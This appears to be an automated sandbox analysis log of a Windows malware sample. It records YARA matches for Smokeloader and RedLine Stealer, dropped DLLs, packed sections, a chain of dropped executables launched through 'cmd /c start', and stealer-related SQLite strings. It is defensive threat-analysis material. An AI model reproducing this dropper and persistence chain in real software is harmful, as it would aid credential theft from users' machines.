Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C85AC30 0_2_6C85AC30
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C77ECC0 0_2_6C77ECC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C816D90 0_2_6C816D90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C90CDC0 0_2_6C90CDC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C908D20 0_2_6C908D20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C784DB0 0_2_6C784DB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C8AAD50 0_2_6C8AAD50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C84ED70 0_2_6C84ED70
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C806E90 0_2_6C806E90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C820EC0 0_2_6C820EC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C860E20 0_2_6C860E20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C78AEC0 0_2_6C78AEC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C81EE70 0_2_6C81EE70
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C8C8FB0 0_2_6C8C8FB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7EEF40 0_2_6C7EEF40
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C786F10 0_2_6C786F10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C85EFF0 0_2_6C85EFF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C780FE0 0_2_6C780FE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C8C0F20 0_2_6C8C0F20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C78EFB0 0_2_6C78EFB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C842F70 0_2_6C842F70
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7D0820 0_2_6C7D0820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C8868E0 0_2_6C8868E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C80A820 0_2_6C80A820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C854840 0_2_6C854840
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C7B8960 0_2_6C7B8960
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6C9009D0 appears 69 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 00404610 appears 316 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6C7194D0 appears 90 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6C70CBE8 appears 134 times
One or more processes crash
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6720 -s 2376
Sample file is different than original file name gathered from version info
Source: file.exe, 00000000.00000002.2521834305.000000006C955000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe
Source: file.exe, 00000000.00000000.2043692814.000000000244C000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamesOdilesigo@ vs file.exe
Source: file.exe, 00000000.00000002.2521119351.000000006C762000.00000002.00000001.01000000.00000008.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
Uses 32bit PE files
Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 00000015.00000002.2719081231.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000022.00000002.2994648505.0000000002620000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000019.00000002.2828964278.00000000026F2000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.2496144397.000000000273D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.2495938996.00000000026E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000015.00000002.2718459013.000000000254D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000019.00000002.2828820044.00000000026B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000022.00000002.2994271346.00000000025E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: random[1].exe0.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: random[1].exe.0.dr Static PE information: Section: ZLIB complexity 0.9997331796448088
Source: random[1].exe.0.dr Static PE information: Section: hoxupgqj ZLIB complexity 0.9948139948104693
Source: RoamingIJEGHJECFC.exe.0.dr Static PE information: Section: ZLIB complexity 0.9997331796448088
Source: RoamingIJEGHJECFC.exe.0.dr Static PE information: Section: hoxupgqj ZLIB complexity 0.9948139948104693
Source: userAAKKKEBFCG.exe.0.dr Static PE information: Section: ZLIB complexity 0.9973124574250681
Source: userAAKKKEBFCG.exe.0.dr Static PE information: Section: zywzqxul ZLIB complexity 0.9946734005177514
Source: explorti.exe.5.dr Static PE information: Section: ZLIB complexity 0.9997331796448088
Source: explorti.exe.5.dr Static PE information: Section: hoxupgqj ZLIB complexity 0.9948139948104693
Source: axplong.exe.8.dr Static PE information: Section: ZLIB complexity 0.9973124574250681
Source: axplong.exe.8.dr Static PE information: Section: zywzqxul ZLIB complexity 0.9946734005177514
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@47/54@32/10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C737030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree, 0_2_6C737030
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004190A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 0_2_004190A0
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Q7H2EQ2W.htm Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4068:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2676:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6720
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5168
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7968
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4744
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe File created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7 Jump to behavior
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: file.exe, 00000000.00000002.2520671321.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2509615425.000000001CBA1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2521346401.000000006C90F000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: file.exe, 00000000.00000002.2520671321.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2509615425.000000001CBA1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2521346401.000000006C90F000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.2520671321.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2509615425.000000001CBA1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2521346401.000000006C90F000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.2520671321.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2509615425.000000001CBA1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2521346401.000000006C90F000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: file.exe, file.exe, 00000000.00000002.2520671321.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2509615425.000000001CBA1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2521346401.000000006C90F000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.2520671321.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2509615425.000000001CBA1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000000.00000002.2520671321.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2509615425.000000001CBA1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2521346401.000000006C90F000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: file.exe, 00000000.00000003.2134857222.0000000022C85000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2122596582.0000000022C69000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.2520671321.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2509615425.000000001CBA1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: file.exe, 00000000.00000002.2520671321.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2509615425.000000001CBA1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: file.exe Virustotal: Detection: 42%
Source: RoamingIJEGHJECFC.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: userAAKKKEBFCG.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingIJEGHJECFC.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\RoamingIJEGHJECFC.exe "C:\Users\user\AppData\RoamingIJEGHJECFC.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userAAKKKEBFCG.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\userAAKKKEBFCG.exe "C:\Users\userAAKKKEBFCG.exe"
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6720 -s 2376
Source: C:\Users\userAAKKKEBFCG.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe "C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe"
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7968 -s 1332
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe "C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe "C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe"
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4744 -s 1292
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe "C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe"
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: unknown Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account --attempting-deelevation
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2260 -parentBuildID 20230927232528 -prefsHandle 2204 -prefMapHandle 2196 -prefsLen 25308 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {37ba41c5-ee86-4e0d-ae50-58ce2311310d} 3712 "\\.\pipe\gecko-crash-server-pipe.3712" 1b10486e910 socket
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe "C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe"
Source: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5168 -s 1036
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2200 -parentBuildID 20230927232528 -prefsHandle 2136 -prefMapHandle 2128 -prefsLen 25350 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9f4ac7dc-960f-42f4-ad8d-3d9c0af60b93} 2940 "\\.\pipe\gecko-crash-server-pipe.2940" 193b946bd10 socket
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingIJEGHJECFC.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userAAKKKEBFCG.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\RoamingIJEGHJECFC.exe "C:\Users\user\AppData\RoamingIJEGHJECFC.exe" Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGHJECFC.exe Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\userAAKKKEBFCG.exe "C:\Users\userAAKKKEBFCG.exe" Jump to behavior
Source: C:\Users\userAAKKKEBFCG.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe "C:\Users\user\AppData\Local\Temp\1000016001\9fa327eb6c.exe"
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe "C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe"
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Users\user\AppData\Local\Temp\1000017001\8e8f4571c5.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2260 -parentBuildID 20230927232528 -prefsHandle 2204 -prefMapHandle 2196 -prefsLen 25308 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {37ba41c5-ee86-4e0d-ae50-58ce2311310d} 3712 "\\.\pipe\gecko-crash-server-pipe.3712" 1b10486e910 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2200 -parentBuildID 20230927232528 -prefsHandle 2136 -prefMapHandle 2128 -prefsLen 25350 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9f4ac7dc-960f-42f4-ad8d-3d9c0af60b93} 2940 "\\.\pipe\gecko-crash-server-pipe.2940" 193b946bd10 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msvcr100.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mozglue.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll Jump to behavior
